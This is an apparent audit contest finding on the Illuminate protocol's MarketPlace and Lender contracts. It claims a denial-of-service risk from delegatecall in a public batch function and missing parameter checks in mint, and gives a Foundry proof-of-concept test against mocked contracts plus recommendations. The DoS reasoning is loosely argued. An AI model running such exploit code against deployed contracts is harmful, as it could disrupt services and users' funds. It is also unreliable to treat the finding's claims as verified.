Zer0Luck

medium

# Zer0Luck - A vulnerability to a dos attack occurs due to the use of the delegatecall command within the batch function that is available from the outside. A vulnerability to improper parameter validation in the mint function also exists.

## Summary
- A vulnerability to a dos attack occurs due to the use of the delegatecall command within the batch function that is available from the outside.
- A vulnerability to improper parameter validation in the mint function also exists.

## Vulnerability Detail
**A vulnerability to a dos attack occurs due to the use of the delegatecall command within the batch function that is available from the outside.** 
https://github.com/sherlock-audit/2023-01-illuminate/blob/main/src/MarketPlace.sol#L638-L651

https://github.com/sherlock-audit/2023-01-illuminate/blob/main/src/Lender.sol#L1068-L1083

It has been identified that the function is able to receive ether by assigning the `payable` and trigger a specific function, and also able to receive a `byte array type` as an argument, which means that it is possible to repeatedly call the function. An attack vector exists where `delegatecall` can be performed within the `address(this)` corresponding address of `MarketPlace.sol` and `Lender.sol.`
 Due to the lack of internal validation or confirmation of external user access or call origin address, an attacker can repeatedly call the function with a large amount of data, making it a vulnerability.

**A vulnerability to improper parameter validation in the mint function also exists.**
https://github.com/sherlock-audit/2023-01-illuminate/blob/main/src/MarketPlace.sol#L474-L509

 The mint function does not properly validate the values of its parameters, allowing for the possibility of passing 0or unintended values for b,p, minRatio, maxRatio. This can result in errors within the function not causing a revertto occur and instead returning the underlyingIn, principalTokensIn, mintedvalues to the user who called the function.

## Impact
 It is possible to use delegatecallto repeatedly call functions within the contracts marketPlace.sol, Lender.solby assigning the simple byte data structure below, creating a vector for additional gas consumption and potentially causing a service denial of service (DOS) attack.
```solidity
payload[0] = abi.encodeWithSignature(
  "exploit(address)",
  address(mp.admin())
);
```
 While the parent call is limited to the specific contract, if an attacker were to use the batch function to call multiple dependent functions within the contract, it could result in severe gas consumption and potential conflicts with state variables.
 It is possible to verify that an attacker continuously calls the mint function by using the payload below, and it can also be verified that there is no internal validation for the arguments used when calling the mint function. For example, if the maximum value is entered, the transaction will be successful, Also, the validation for the minRatio, maxRatio is inadequate, so it is possible to process the same value even if it is entered.

```solidity
// POC
function testExploit() public {
    // [vuln] function function batch(bytes[] calldata c)

    // address admin check
    emit log_named_address("[Attacker::Exploited] Admin => ", mp.admin());


    // batch call => mint
    vm.startPrank(attacker);
    pool.baseReturns(address(token1));
    pool.fyTokenReturns(address(token2));
    token1.transferFromReturns(true);
    token2.transferFromReturns(true);
    pool.mintReturns(1, 2, 3);

    uint256 uA = ~uint256(0);
    uint256 ptA = ~uint256(0);
    uint256 minRatio = ~uint256(0);
    uint256 maxRatio = ~uint256(0);
    // mp.mint(underlying, maturity, uA, ptA, minRatio, maxRatio);

    // DOS
    bytes[] memory payload = new bytes[](20);
    for (uint256 x; x != payload.length;) {
        payload[x] = abi.encodeWithSignature(
            "mint(address,uint256,uint256,uint256,uint256,uint256)",
            underlying,
            maturity,
            uA,
            ptA,
            minRatio,
            maxRatio
        );
        unchecked {
            x++;
        }
        emit log_named_uint("[Attacker=>mint batch dcall", x);
    }

    mp.batch(payload);
    vm.stopPrank();   
}

```
- A vulnerability in the form of a service denial of service (DOS) attack and storage collision, stemming from the use of the delegatecall command within the batch function.
- A vulnerability to improper parameter validation in the mint function, where it does not properly validate the values of its parameters.

## Code Snippet
See Vulnerability Detail
## Tool used
Manual Review

## Recommendation
- It is necessary to have internal validation for the functions called through `delegatecall` within the batch function.
- It is necessary to limit the gas consumption of the functions called through `delegatecall` within the batch function.
- It is necessary to prevent storage pollution of the functions called through `delegatecall` within the batch function.
- It is necessary to have branch validation for `minRatio, maxRatio` within the `mint` function.
- It is necessary to have branch validation for `uA, ptA` within the `mint` function.